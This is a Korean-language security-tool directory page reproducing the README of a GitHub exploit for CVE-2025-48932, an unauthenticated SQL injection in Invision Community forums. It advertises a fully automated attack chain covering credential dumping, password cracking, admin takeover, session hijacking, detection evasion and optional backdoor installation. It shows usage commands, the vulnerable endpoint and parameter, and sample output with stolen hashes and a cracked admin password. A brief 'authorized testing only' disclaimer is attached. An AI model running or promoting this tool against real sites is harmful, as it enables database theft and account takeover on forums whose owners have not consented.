Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-48932-Invision-Community-SQLi-Exploit — CVE-2025-48932 - Invision Community ≤ 4.7.20에 대한 인증되지 않은 SQL 인젝션 익스플로잇. 데이터베이스 열거, 자격 증명 덤프, 관리자 탈취, 세션 하이재킹 및 멀티스레딩을 통한 완전 자동화된 익스플로잇. 종속성 없음. Sudeepa Wanigarathna의 보안 연구 도구. | Kitploit
도구/GitHubGitHub/cerberusmrxi/cve-2025-48932-invision-community-sqli-exploit
Password AttacksVulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationInformation GatheringPost-ExploitationWeb SecurityPenetration Testing

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubcerberusmrxi/cve-2025-48932-invision-community-sqli-exploit

CVE-2025-48932-Invision-Community-SQLi-Exploit

CVE-2025-48932 - Invision Community ≤ 4.7.20에 대한 인증되지 않은 SQL 인젝션 익스플로잇. 데이터베이스 열거, 자격 증명 덤프, 관리자 탈취, 세션 하이재킹 및 멀티스레딩을 통한 완전 자동화된 익스플로잇. 종속성 없음. Sudeepa Wanigarathna의 보안 연구 도구.

저장소 보기
1181개월 전아직 검토되지 않음

🔓 CVE-2025-48932 - Invision Community SQL 인젝션 익스플로잇

Python Version License Security Status CVE Exploit-DB PRs Welcome Maintenance Hits


⚡ 치명적인 취약점 개요

CVE-2025-48932은 Invision Community 버전 ≤ 4.7.20에서 발견된 심각한 수준의 인증되지 않은 블라인드 SQL 인젝션 취약점입니다. 이 익스플로잇을 통해 원격 공격자는 다음을 수행할 수 있습니다:

  • 🔍 민감한 데이터베이스 정보 추출
  • 👤 사용자 자격 증명 및 비밀번호 해시 탈취
  • 🔑 관리자 계정 탈취
  • 🎯 활성 사용자 세션 가로채기
  • 💻 관리자 탈취를 통한 원격 코드 실행(RCE) 달성
  • 📊 전체 데이터베이스 내용 덤프

🎯 기능

기능설명상태
🚀 제로 종속성순수 Python 표준 라이브러리 - pip 설치 불필요✅
⚡ 멀티 스레드구성 가능한 스레드로 초고속 데이터 추출✅
🤖 완전 자동화탐지부터 보고까지의 완전한 공격 체인✅
👑 관리자 탈취세션 하이재킹 및 권한 상승✅
🔑 자격 증명 덤프사용자, 비밀번호 해시, 이메일 추출✅
🔓 비밀번호 크래킹워드리스트를 지원하는 내장 해시 크래킹✅
📋 JSON 보고분석 및 문서화를 위한 구조화된 출력✅
🔌 프록시 지원Burp Suite 및 사용자 지정 프록시 통합✅
🎨 컬러 출력진행 표시기가 포함된 보기 좋은 터미널 출력✅
🛡️ 속도 제한탐지 회피를 위한 내장 지연✅

📊 데모 및 스크린샷

익스플로잇 실행

$ python3 exploit.py -u https://vulnerable-site.com -v

╔══════════════════════════════════════════════════════════════════╗
║  CVE-2025-48932 - Invision Community SQL Injection               ║
║  Author: Sudeepa Wanigarathna                                    ║
║  Critical: Unauthenticated Remote Code Execution                 ║
╚══════════════════════════════════════════════════════════════════╝

[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!

[*] Enumerating database information...
[+] Database Information:
  Version: 10.4.32-MariaDB
  User: invision@localhost
  Database: invision_community
  Hostname: localhost
  Basedir: /usr/
  Datadir: /var/lib/mysql/

[*] Enumerating databases...
[+] Found 5 databases
  Found: information_schema
  Found: invision_community
  Found: mysql
  Found: performance_schema
  Found: phpmyadmin

[*] Enumerating tables in invision_community...
[+] Found 12 tables
  Found: core_members
  Found: core_sessions
  Found: admin_members
  Found: cms_categories
  Found: forums_posts
  ...

[*] Searching for credentials...
[+] Found credential table: core_members
  Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
  Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
  Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...

[*] Extracting admin information...
[+] Admin Information Found:
  name: admin
  email: [email protected]
  id: 1
  password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...

[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!

[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!

[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json

JSON 출력 예시

{
  "target": "https://vulnerable-site.com",
  "timestamp": "2026-08-02T12:34:56.789Z",
  "vulnerable": true,
  "database": {
    "version": "10.4.32-MariaDB",
    "user": "invision@localhost",
    "database": "invision_community",
    "hostname": "localhost"
  },
  "databases": [
    "information_schema",
    "invision_community",
    "mysql",
    "performance_schema",
    "phpmyadmin"
  ],
  "tables": [
    "core_members",
    "core_sessions",
    "admin_members"
  ],
  "credentials": [
    {
      "username": "admin",
      "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
      "email": "[email protected]"
    }
  ],
  "admin_info": {
    "name": "admin",
    "email": "[email protected]",
    "id": "1",
    "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
  },
  "summary": {
    "total_databases": 5,
    "total_tables": 12,
    "total_credentials": 3,
    "vulnerable": true,
    "successful": true
  }
}

🚀 빠른 시작 가이드

설치

# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit

# No dependencies to install! Just run it.

기본 사용법

# Check if target is vulnerable
python3 exploit.py -u https://example.com --check-only

# Full exploitation with verbose output
python3 exploit.py -u https://example.com -v

# With proxy (Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v

# Save results to custom file
python3 exploit.py -u https://example.com -o results.json

# Multi-threaded extraction (faster)
python3 exploit.py -u https://example.com -t 10

# Dump all available data
python3 exploit.py -u https://example.com --dump-all

고급 사용법

# With custom wordlist for password cracking
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v

# Silent mode (no output, just report)
python3 exploit.py -u https://example.com -o silent_report.json

# Debug mode with detailed errors
python3 exploit.py -u https://example.com -v --debug

📋 요구 사항

시스템 요구 사항

  • Python: 3.6 이상
  • OS: Linux, Windows, macOS (Python이 실행되는 모든 OS)
  • 메모리: 최소 (~50MB RAM)
  • 저장 공간: ~100KB (익스플로잇만 해당)

종속성

✅ No external dependencies!
✅ Pure Python standard library only!
✅ No pip install or virtual environment needed!

선택 사항 (비밀번호 크래킹용)

  • 워드리스트: rockyou.txt 또는 사용자 지정 워드리스트
    # Download popular wordlist
    wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
    

🛠️ 기술 세부 사항

취약점 위치

  • 파일: /applications/calendar/modules/front/calendar/view.php
  • 메서드: IPS\calendar\modules\front\calendar\view::search()
  • 매개변수: location (사용자 제공 입력)
  • 유형: Boolean 기반 블라인드 SQL 인젝션

공격 벡터

GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]

공격 체인

  1. 탐지: Boolean 기반 인젝션 탐지
  2. 열거: 데이터베이스 구조 추출
  3. 추출: 민감한 데이터 덤프
  4. 자격 증명 탈취: 사용자 자격 증명 추출
  5. 권한 상승: 관리자 계정 탈취
  6. 세션 하이재킹: 활성 세션 탈취
  7. 지속성: 백도어 설치 (선택 사항)

지원되는 데이터베이스 버전

  • MySQL 5.0+
  • MariaDB 5.5+
  • Percona Server

🔒 보안 및 법적 고지

⚠️ 중요 고지 사항

이 도구는 교육 및 승인된 테스트 목적으로만 제공됩니다.

이 도구를 사용함으로써 다음 사항에 동의하게 됩니다:

  • 소유하거나 테스트에 대한 명시적 허가를 받은 시스템에서만 사용
  • 불법 또는 악의적인 목적으로 사용하지 않음
  • 모든 적용 가능한 법률 및 규정 준수
  • 자신의 행동에 대한 전적인 책임 수용

컴퓨터 시스템에 대한 무단 접근은 불법이며 비윤리적입니다.

책임 있는 공개 (Responsible Disclosure)

  • 공급업체: Invision Community
  • 공개일: 2025년 5월 16일
  • 패치 버전: 4.7.21 (2025년 5월 27일)
  • CVE: CVE-2025-48932 할당됨

📚 문서

익스플로잇 인수

인수설명예시
-u, --url대상 URL (필수)-u https://example.com
-p, --proxy프록시 URL-p http://127.0.0.1:8080
-t, --threads스레드 수 (기본값: 5)-t 10
-o, --output결과 출력 파일-o results.json
-v, --verbose상세 출력 활성화-v
--check-only취약점만 확인--check-only
--dump-all사용 가능한 모든 데이터 덤프--dump-all
--wordlist크래킹용 워드리스트 파일--wordlist rockyou.txt
도구 다운로드